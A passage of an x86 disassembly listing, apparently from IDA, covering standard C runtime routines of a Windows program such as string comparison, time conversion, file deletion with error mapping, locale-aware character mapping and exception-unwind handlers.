loc_40B45F: ; CODE XREF: sub_40B283+18D�j
; sub_40B283+19C�j ...
test edx, edx
jz short loc_40B468
mov eax, [ebp+var_4]
mov [edx], eax
loc_40B468: ; CODE XREF: sub_40B283+1DE�j
test byte ptr [ebp+arg_C], 2
jz short loc_40B476
mov eax, [ebp+var_8]
neg eax
mov [ebp+var_8], eax
loc_40B476: ; CODE XREF: sub_40B283+1E9�j
mov eax, [ebp+var_8]
jmp short loc_40B486
; ---------------------------------------------------------------------------
loc_40B47B: ; CODE XREF: sub_40B283+66�j
; sub_40B283+6F�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_40B484
mov [eax], edi
loc_40B484: ; CODE XREF: sub_40B283+1FD�j
xor eax, eax
loc_40B486: ; CODE XREF: sub_40B283+1F6�j
pop edi
pop esi
pop ebx
leave
retn
sub_40B283 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B490 proc near ; CODE XREF: sub_406E60+17B�p
; sub_406E60+1A1�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_40B4C1
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_40B4BF
jz short loc_40B4C1
dec ecx
dec ecx
loc_40B4BF: ; CODE XREF: sub_40B490+29�j
not ecx
loc_40B4C1: ; CODE XREF: sub_40B490+9�j
; sub_40B490+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_40B490 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B4C8 proc near ; CODE XREF: sub_409DA0+64�p
; sub_409DA0+1B5�p ...
SystemTimeAsFileTime= _FILETIME ptr -8
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+SystemTimeAsFileTime]
push edi
push eax ; lpSystemTimeAsFileTime
call ds:GetSystemTimeAsFileTime ; GetSystemTimeAsFileTime
push 1
push 0
push 0
push [ebp+SystemTimeAsFileTime.dwHighDateTime]
call sub_40B790
sub eax, dword_40FC30
mov ecx, [ebp+SystemTimeAsFileTime.dwLowDateTime]
sbb edx, dword_40FC34
xor edi, edi
add eax, ecx
push edi
adc edx, edi
push 2710h
push edx
push eax
call sub_40B720
pop edi
leave
retn
sub_40B4C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B50B proc near ; DATA XREF: .data:0040F00C�o
SystemTimeAsFileTime= _FILETIME ptr -8
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+SystemTimeAsFileTime]
push esi
push eax ; lpSystemTimeAsFileTime
call ds:GetSystemTimeAsFileTime ; GetSystemTimeAsFileTime
push 1
push 0
push 0
push [ebp+SystemTimeAsFileTime.dwHighDateTime]
call sub_40B790
mov ecx, [ebp+SystemTimeAsFileTime.dwLowDateTime]
xor esi, esi
add eax, ecx
adc edx, esi
mov dword_40FC30, eax
mov dword_40FC34, edx
pop esi
leave
retn
sub_40B50B endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40B540(LPCSTR lpFileName)
sub_40B540 proc near ; CODE XREF: sub_40B56A+4�p
lpFileName = dword ptr 4
push [esp+lpFileName] ; lpFileName
call ds:DeleteFileA ; DeleteFileA
test eax, eax
jnz short loc_40B556
call ds:GetLastError
jmp short loc_40B558
; ---------------------------------------------------------------------------
loc_40B556: ; CODE XREF: sub_40B540+C�j
xor eax, eax
loc_40B558: ; CODE XREF: sub_40B540+14�j
test eax, eax
jz short loc_40B567
push eax
call sub_40B575
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40B567: ; CODE XREF: sub_40B540+1A�j
xor eax, eax
retn
sub_40B540 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40B56A(LPCSTR lpFileName)
sub_40B56A proc near ; CODE XREF: sub_40ACD0+53�p
lpFileName = dword ptr 4
push [esp+lpFileName] ; lpFileName
call sub_40B540
pop ecx
retn
sub_40B56A endp
; =============== S U B R O U T I N E =======================================
sub_40B575 proc near ; CODE XREF: sub_40B16E+1F�p
; sub_40B540+1D�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor edx, edx
mov dword_40FBE4, ecx
mov eax, offset dword_40F750
loc_40B586: ; CODE XREF: sub_40B575+1E�j
cmp ecx, [eax]
jz short loc_40B5AA
add eax, 8
inc edx
cmp eax, offset off_40F8B8
jl short loc_40B586
cmp ecx, 13h
jb short loc_40B5B7
cmp ecx, 24h
ja short loc_40B5B7
mov dword_40FBE0, 0Dh
retn
; ---------------------------------------------------------------------------
loc_40B5AA: ; CODE XREF: sub_40B575+13�j
mov eax, dword_40F754[edx*8]
mov dword_40FBE0, eax
retn
; ---------------------------------------------------------------------------
loc_40B5B7: ; CODE XREF: sub_40B575+23�j
; sub_40B575+28�j
cmp ecx, 0BCh
jb short loc_40B5D1
cmp ecx, 0CAh
mov dword_40FBE0, 8
jbe short locret_40B5DB
loc_40B5D1: ; CODE XREF: sub_40B575+48�j
mov dword_40FBE0, 16h
locret_40B5DB: ; CODE XREF: sub_40B575+5A�j
retn
sub_40B575 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B5DC(const CHAR CharType)
sub_40B5DC proc near ; CODE XREF: sub_40B283+12B�p
DestStr = byte ptr -4
var_3 = byte ptr -3
CharType = byte ptr 8
push ebp
mov ebp, esp
push ecx
cmp Locale, 0
push ebx
jnz short loc_40B607
mov eax, dword ptr [ebp+CharType]
cmp eax, 61h
jl loc_40B6A5
cmp eax, 7Ah
jg loc_40B6A5
sub eax, 20h
jmp loc_40B6A5
; ---------------------------------------------------------------------------
loc_40B607: ; CODE XREF: sub_40B5DC+C�j
mov ebx, dword ptr [ebp+CharType]
cmp ebx, 100h
jge short loc_40B63A
cmp dword_40FAC4, 1
jle short loc_40B627
push 2 ; int
push ebx ; CharType
call sub_40B6A8
pop ecx
pop ecx
jmp short loc_40B632
; ---------------------------------------------------------------------------
loc_40B627: ; CODE XREF: sub_40B5DC+3D�j
mov eax, off_40F8B8
mov al, [eax+ebx*2]
and eax, 2
loc_40B632: ; CODE XREF: sub_40B5DC+49�j
test eax, eax
jnz short loc_40B63A
loc_40B636: ; CODE XREF: sub_40B5DC+AF�j
mov eax, ebx
jmp short loc_40B6A5
; ---------------------------------------------------------------------------
loc_40B63A: ; CODE XREF: sub_40B5DC+34�j
; sub_40B5DC+58�j
mov edx, off_40F8B8
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_40B65D
and byte ptr [ebp+0Ah], 0
mov [ebp+CharType], al
mov [ebp+9], bl
push 2
jmp short loc_40B666
; ---------------------------------------------------------------------------
loc_40B65D: ; CODE XREF: sub_40B5DC+71�j
and byte ptr [ebp+9], 0
mov [ebp+CharType], bl
push 1
loc_40B666: ; CODE XREF: sub_40B5DC+7F�j
pop eax
lea ecx, [ebp+DestStr]
push 1 ; int
push 0 ; CodePage
push 3 ; cchDest
push ecx ; lpDestStr
push eax ; cbMultiByte
lea eax, [ebp+CharType]
push eax ; lpMultiByteStr
push 200h ; dwMapFlags
push Locale ; Locale
call sub_40B7C4
add esp, 20h
test eax, eax
jz short loc_40B636
cmp eax, 1
jnz short loc_40B698
movzx eax, [ebp+DestStr]
jmp short loc_40B6A5
; ---------------------------------------------------------------------------
loc_40B698: ; CODE XREF: sub_40B5DC+B4�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+DestStr]
shl eax, 8
or eax, ecx
loc_40B6A5: ; CODE XREF: sub_40B5DC+14�j
; sub_40B5DC+1D�j ...
pop ebx
leave
retn
sub_40B5DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B6A8(WORD CharType,int)
sub_40B6A8 proc near ; CODE XREF: sub_40B283+27�p
; sub_40B283+E4�p ...
MultiByteStr = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
CharType = word ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, dword ptr [ebp+CharType]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_40B6C6
mov ecx, off_40F8B8
movzx eax, word ptr [ecx+eax*2]
jmp short loc_40B718
; ---------------------------------------------------------------------------
loc_40B6C6: ; CODE XREF: sub_40B6A8+10�j
mov ecx, eax
push esi
mov esi, off_40F8B8
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_40B6EB
and [ebp+var_2], 0
mov [ebp+MultiByteStr], cl
mov [ebp+var_3], al
push 2
jmp short loc_40B6F4
; ---------------------------------------------------------------------------
loc_40B6EB: ; CODE XREF: sub_40B6A8+33�j
and [ebp+var_3], 0
mov [ebp+MultiByteStr], al
push 1
loc_40B6F4: ; CODE XREF: sub_40B6A8+41�j
pop eax
lea ecx, [ebp+0Ah]
push 1 ; int
push 0 ; Locale
push 0 ; CodePage
push ecx ; lpCharType
push eax ; cbMultiByte
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
push 1 ; dwInfoType
call sub_40BA13
add esp, 1Ch
test eax, eax
jnz short loc_40B714
leave
retn
; ---------------------------------------------------------------------------
loc_40B714: ; CODE XREF: sub_40B6A8+68�j
movzx eax, word ptr [ebp+0Ah]
loc_40B718: ; CODE XREF: sub_40B6A8+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_40B6A8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40B720 proc near ; CODE XREF: sub_40B4C8+3B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_40B742
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_40B783
; ---------------------------------------------------------------------------
loc_40B742: ; CODE XREF: sub_40B720+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_40B750: ; CODE XREF: sub_40B720+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_40B750
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_40B77E
cmp edx, [esp+8+arg_4]
ja short loc_40B77E
jb short loc_40B77F
cmp eax, [esp+8+arg_0]
jbe short loc_40B77F
loc_40B77E: ; CODE XREF: sub_40B720+4E�j
; sub_40B720+54�j
dec esi
loc_40B77F: ; CODE XREF: sub_40B720+56�j
; sub_40B720+5C�j
xor edx, edx
mov eax, esi
loc_40B783: ; CODE XREF: sub_40B720+20�j
pop esi
pop ebx
retn 10h
sub_40B720 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40B790 proc near ; CODE XREF: sub_40B4C8+19�p
; sub_40B50B+19�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_40B7A9
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_40B7A9: ; CODE XREF: sub_40B790+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_40B790 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B7C4(LCID Locale,DWORD dwMapFlags,LPCSTR lpMultiByteStr,int cbMultiByte,LPSTR lpDestStr,int cchDest,UINT CodePage,int)
sub_40B7C4 proc near ; CODE XREF: sub_40B5DC+A5�p
var_28 = dword ptr -28h
lpSrcStr = dword ptr -24h
var_20 = dword ptr -20h
cchSrc = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
Locale = dword ptr 8
dwMapFlags = dword ptr 0Ch
lpMultiByteStr = dword ptr 10h
cbMultiByte = dword ptr 14h
lpDestStr = dword ptr 18h
cchDest = dword ptr 1Ch
CodePage = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_40D878
push offset sub_40BC54
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp dword_40FC38, edi
jnz short loc_40B83A
push edi ; cchDest
push edi ; lpDestStr
push 1
pop ebx
push ebx ; cchSrc
push offset SrcStr ; lpSrcStr
mov esi, 100h
push esi ; dwMapFlags
push edi ; Locale
call ds:LCMapStringW ; LCMapStringW
test eax, eax
jz short loc_40B818
mov dword_40FC38, ebx
jmp short loc_40B83A
; ---------------------------------------------------------------------------
loc_40B818: ; CODE XREF: sub_40B7C4+4A�j
push edi ; cchDest
push edi ; lpDestStr
push ebx ; cchSrc
push offset byte_40D870 ; lpSrcStr
push esi ; dwMapFlags
push edi ; Locale
call ds:LCMapStringA ; LCMapStringA
test eax, eax
jz loc_40B952
mov dword_40FC38, 2
loc_40B83A: ; CODE XREF: sub_40B7C4+2E�j
; sub_40B7C4+52�j
cmp [ebp+cbMultiByte], edi
jle short loc_40B84F
push [ebp+cbMultiByte]
push [ebp+lpMultiByteStr]
call sub_40B9E8
pop ecx
pop ecx
mov [ebp+cbMultiByte], eax
loc_40B84F: ; CODE XREF: sub_40B7C4+79�j
mov eax, dword_40FC38
cmp eax, 2
jnz short loc_40B876
push [ebp+cchDest] ; cchDest
push [ebp+lpDestStr] ; lpDestStr
push [ebp+cbMultiByte] ; cchSrc
push [ebp+lpMultiByteStr] ; lpSrcStr
push [ebp+dwMapFlags] ; dwMapFlags
push [ebp+Locale] ; Locale
call ds:LCMapStringA ; LCMapStringA
jmp loc_40B954
; ---------------------------------------------------------------------------
loc_40B876: ; CODE XREF: sub_40B7C4+93�j
cmp eax, 1
jnz loc_40B952
cmp [ebp+CodePage], edi
jnz short loc_40B88C
mov eax, dword_40FC54
mov [ebp+CodePage], eax
loc_40B88C: ; CODE XREF: sub_40B7C4+BE�j
push edi ; cchWideChar
push edi ; lpWideCharStr
push [ebp+cbMultiByte] ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax ; dwFlags
push [ebp+CodePage] ; CodePage
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov ebx, eax
mov [ebp+cchSrc], ebx
cmp ebx, edi
jz loc_40B952
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_40AF70
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+lpSrcStr], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_40B8E7
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+lpSrcStr], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+cchSrc]
loc_40B8E7: ; CODE XREF: sub_40B7C4+10E�j
cmp [ebp+lpSrcStr], edi
jz short loc_40B952
push ebx ; cchWideChar
push [ebp+lpSrcStr] ; lpWideCharStr
push [ebp+cbMultiByte] ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push 1 ; dwFlags
push [ebp+CodePage] ; CodePage
call ds:MultiByteToWideChar ; MultiByteToWideChar
test eax, eax
jz short loc_40B952
push edi ; cchDest
push edi ; lpDestStr
push ebx ; cchSrc
push [ebp+lpSrcStr] ; lpSrcStr
push [ebp+dwMapFlags] ; dwMapFlags
push [ebp+Locale] ; Locale
call ds:LCMapStringW ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_40B952
test byte ptr [ebp+dwMapFlags+1], 4
jz short loc_40B966
cmp [ebp+cchDest], edi
jz loc_40B9E1
cmp esi, [ebp+cchDest]
jg short loc_40B952
push [ebp+cchDest] ; cchDest
push [ebp+lpDestStr] ; lpDestStr
push ebx ; cchSrc
push [ebp+lpSrcStr] ; lpSrcStr
push [ebp+dwMapFlags] ; dwMapFlags
push [ebp+Locale] ; Locale
call ds:LCMapStringW ; LCMapStringW
test eax, eax
jnz loc_40B9E1
loc_40B952: ; CODE XREF: sub_40B7C4+66�j
; sub_40B7C4+B5�j ...
xor eax, eax
loc_40B954: ; CODE XREF: sub_40B7C4+AD�j
; sub_40B7C4+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40B966: ; CODE XREF: sub_40B7C4+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_40AF70
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_40B99A
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_40B99A: ; CODE XREF: sub_40B7C4+1C2�j
cmp ebx, edi
jz short loc_40B952
push esi ; cchDest
push ebx ; lpDestStr
push [ebp+cchSrc] ; cchSrc
push [ebp+lpSrcStr] ; lpSrcStr
push [ebp+dwMapFlags] ; dwMapFlags
push [ebp+Locale] ; Locale
call ds:LCMapStringW ; LCMapStringW
test eax, eax
jz short loc_40B952
cmp [ebp+cchDest], edi
push edi ; lpUsedDefaultChar
push edi ; lpDefaultChar
jnz short loc_40B9C1
push edi
push edi
jmp short loc_40B9C7
; ---------------------------------------------------------------------------
loc_40B9C1: ; CODE XREF: sub_40B7C4+1F7�j
push [ebp+cchDest] ; cbMultiByte
push [ebp+lpDestStr] ; lpMultiByteStr
loc_40B9C7: ; CODE XREF: sub_40B7C4+1FB�j
push esi ; cchWideChar
push ebx ; lpWideCharStr
push 220h ; dwFlags
push [ebp+CodePage] ; CodePage
call ds:WideCharToMultiByte ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_40B952
loc_40B9E1: ; CODE XREF: sub_40B7C4+165�j
; sub_40B7C4+188�j
mov eax, esi
jmp loc_40B954
sub_40B7C4 endp
; =============== S U B R O U T I N E =======================================
sub_40B9E8 proc near ; CODE XREF: sub_40B7C4+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_40BA05
loc_40B9F8: ; CODE XREF: sub_40B9E8+1B�j
cmp byte ptr [eax], 0
jz short loc_40BA05
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_40B9F8
loc_40BA05: ; CODE XREF: sub_40B9E8+E�j
; sub_40B9E8+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_40BA10
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_40BA10: ; CODE XREF: sub_40B9E8+21�j
mov eax, edx
retn
sub_40B9E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40BA13(DWORD dwInfoType,LPCSTR lpMultiByteStr,int cbMultiByte,LPWORD lpCharType,UINT CodePage,LCID Locale,int)
sub_40BA13 proc near ; CODE XREF: sub_40B6A8+5E�p
var_24 = dword ptr -24h
cchWideChar = dword ptr -20h
CharType = word ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
dwInfoType = dword ptr 8
lpMultiByteStr = dword ptr 0Ch
cbMultiByte = dword ptr 10h
lpCharType = dword ptr 14h
CodePage = dword ptr 18h
Locale = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_40D890
push offset sub_40BC54
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword_40FC5C
xor ebx, ebx
cmp eax, ebx
jnz short loc_40BA82
lea eax, [ebp+CharType]
push eax ; lpCharType
push 1
pop esi
push esi ; cchSrc
push offset SrcStr ; lpSrcStr
push esi ; dwInfoType
call ds:GetStringTypeW ; GetStringTypeW
test eax, eax
jz short loc_40BA60
mov eax, esi
jmp short loc_40BA7D
; ---------------------------------------------------------------------------
loc_40BA60: ; CODE XREF: sub_40BA13+47�j
lea eax, [ebp+CharType]
push eax ; lpCharType
push esi ; cchSrc
push offset byte_40D870 ; lpSrcStr
push esi ; dwInfoType
push ebx ; Locale
call ds:GetStringTypeA ; GetStringTypeA
test eax, eax
jz loc_40BB48
push 2
pop eax
loc_40BA7D: ; CODE XREF: sub_40BA13+4B�j
mov dword_40FC5C, eax
loc_40BA82: ; CODE XREF: sub_40BA13+2F�j
cmp eax, 2
jnz short loc_40BAAB
mov eax, [ebp+Locale]
cmp eax, ebx
jnz short loc_40BA93
mov eax, Locale
loc_40BA93: ; CODE XREF: sub_40BA13+79�j
push [ebp+lpCharType] ; lpCharType
push [ebp+cbMultiByte] ; cchSrc
push [ebp+lpMultiByteStr] ; lpSrcStr
push [ebp+dwInfoType] ; dwInfoType
push eax ; Locale
call ds:GetStringTypeA ; GetStringTypeA
jmp loc_40BB4A
; ---------------------------------------------------------------------------
loc_40BAAB: ; CODE XREF: sub_40BA13+72�j
cmp eax, 1
jnz loc_40BB48
cmp [ebp+CodePage], ebx
jnz short loc_40BAC1
mov eax, dword_40FC54
mov [ebp+CodePage], eax
loc_40BAC1: ; CODE XREF: sub_40BA13+A4�j
push ebx ; cchWideChar
push ebx ; lpWideCharStr
push [ebp+cbMultiByte] ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax ; dwFlags
push [ebp+CodePage] ; CodePage
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov [ebp+cchWideChar], eax
cmp eax, ebx
jz short loc_40BB48
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_40AF70
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_40BD30
add esp, 0Ch
jmp short loc_40BB17
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_40BB17: ; CODE XREF: sub_40BA13+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_40BB48
push [ebp+cchWideChar] ; cchWideChar
push esi ; lpWideCharStr
push [ebp+cbMultiByte] ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push 1 ; dwFlags
push [ebp+CodePage] ; CodePage
call ds:MultiByteToWideChar ; MultiByteToWideChar
cmp eax, ebx
jz short loc_40BB48
push [ebp+lpCharType] ; lpCharType
push eax ; cchSrc
push esi ; lpSrcStr
push [ebp+dwInfoType] ; dwInfoType
call ds:GetStringTypeW ; GetStringTypeW
jmp short loc_40BB4A
; ---------------------------------------------------------------------------
loc_40BB48: ; CODE XREF: sub_40BA13+61�j
; sub_40BA13+9B�j ...
xor eax, eax
loc_40BB4A: ; CODE XREF: sub_40BA13+93�j
; sub_40BA13+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40BA13 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BB5C proc near ; CODE XREF: sub_40BC54+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_40BB74
push [ebp+arg_0]
call RtlUnwind ; RtlUnwind
loc_40BB74: ; DATA XREF: sub_40BB5C+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40BB5C endp
; =============== S U B R O U T I N E =======================================
sub_40BB7C proc near ; DATA XREF: sub_40BB9E+A�o
; .text:0040BC0F�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_40BB9D
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_40BB9D: ; CODE XREF: sub_40BB7C+10�j
retn
sub_40BB7C endp
; =============== S U B R O U T I N E =======================================
sub_40BB9E proc near ; CODE XREF: sub_40BC54+67�p
; sub_40BC54+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_40BB7C
push large dword ptr fs:0
mov large fs:0, esp
loc_40BBBB: ; CODE XREF: sub_40BB9E:loc_40BBF6�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40BBF8
cmp esi, [esp+1Ch+arg_4]
jz short loc_40BBF8
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40BBF6
push 101h
mov eax, [ebx+esi*4+8]
call sub_40BC32
call dword ptr [ebx+esi*4+8]
loc_40BBF6: ; CODE XREF: sub_40BB9E+44�j
jmp short loc_40BBBB
; ---------------------------------------------------------------------------
loc_40BBF8: ; CODE XREF: sub_40BB9E+2A�j
; sub_40BB9E+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_40BB9E endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_40BB7C
jnz short locret_40BC28
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_40BC28
mov eax, 1
locret_40BC28: ; CODE XREF: .text:0040BC16�j
; .text:0040BC21�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_40FAD0
jmp short loc_40BC3C
; =============== S U B R O U T I N E =======================================
sub_40BC32 proc near ; CODE XREF: sub_40BB9E+4F�p
; sub_40BC54+78�p
push ebx
push ecx
mov ebx, offset dword_40FAD0
mov ecx, [ebp+8]
loc_40BC3C: ; CODE XREF: .text:0040BC30�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_40BC32 endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BC54 proc near ; DATA XREF: sub_40B7C4+A�o
; sub_40BA13+A�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_40BCF4
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_40BC87: ; CODE XREF: sub_40BC54+90�j
cmp esi, 0FFFFFFFFh
jz short loc_40BCED
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_40BCDB
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_40BCDB
js short loc_40BCE6
mov edi, [ebx+8]
push ebx
call sub_40BB5C
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_40BB9E
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_40BC32
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_40BCDB: ; CODE XREF: sub_40BC54+40�j
; sub_40BC54+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_40BC87
; ---------------------------------------------------------------------------
loc_40BCE6: ; CODE XREF: sub_40BC54+54�j
mov eax, 0
jmp short loc_40BD09
; ---------------------------------------------------------------------------
loc_40BCED: ; CODE XREF: sub_40BC54+36�j
mov eax, 1
jmp short loc_40BD09
; ---------------------------------------------------------------------------
loc_40BCF4: ; CODE XREF: sub_40BC54+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_40BB9E
add esp, 8
pop ebp
mov eax, 1
